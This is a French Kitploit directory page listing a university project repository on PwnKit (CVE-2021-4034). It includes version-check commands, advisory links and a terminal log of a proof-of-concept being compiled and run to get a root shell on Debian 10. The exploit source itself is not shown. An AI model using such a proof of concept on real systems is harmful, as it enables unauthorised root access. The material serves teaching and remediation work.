Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PwnKit-Local-Privilege-Escalation-Vulnerability-Discovered-in-polkit-s-pkexec-CVE-2021-4034 — Cours universitaire sur les vulnérabilités logicielles et leur atténuation, pour montrer l'exploitation et la remédiation causées par cette vulnérabilité. | Kitploit
Outils/GitHubGitHub/milad-rafie/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkit-s-pkexec-cve-2021-4034
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationApprentissage et ÉducationExploitation de BinairesLabs et Pratique
GitHubmilad-rafie/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkit-s-pkexec-cve-2021-4034

PwnKit-Local-Privilege-Escalation-Vulnerability-Discovered-in-polkit-s-pkexec-CVE-2021-4034

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cours universitaire sur les vulnérabilités logicielles et leur atténuation, pour montrer l'exploitation et la remédiation causées par cette vulnérabilité.

Voir le dépôt
il y a 1 anPas encore vérifié

PwnKit - Vulnérabilité d'Élévation de Privilèges Locaux découverte dans pkexec de polkit - CVE-2021-4034 -

Projet universitaire sur les vulnérabilités logicielles et leur atténuation, pour montrer l'exploitation et la correction causées par cette vulnérabilité. Nous avons utilisé pour cette expérience Ubunto version 16.04 LTS, ainsi que Debian 10.1.0 qui sera présenté dans l'expérience. La mise en place de l'environnement était essentielle car vous devez toujours vérifier la version sur laquelle vous travaillez pour être sûr qu'elle est vulnérable ou non. Commandes de vérification utilisées : dpkg -l | grep polkit, pkexec --version

CVE-2021-4034

PoC pour PwnKit : Vulnérabilité d'Élévation de Privilèges Locaux dans pkexec de polkit (CVE-2021-4034)

https://seclists.org/oss-sec/2022/q1/80
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

PoC

Vérifié sur Debian 10 et Ubunto 16.0.4

root@kitploit:~
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
Télécharger l’outil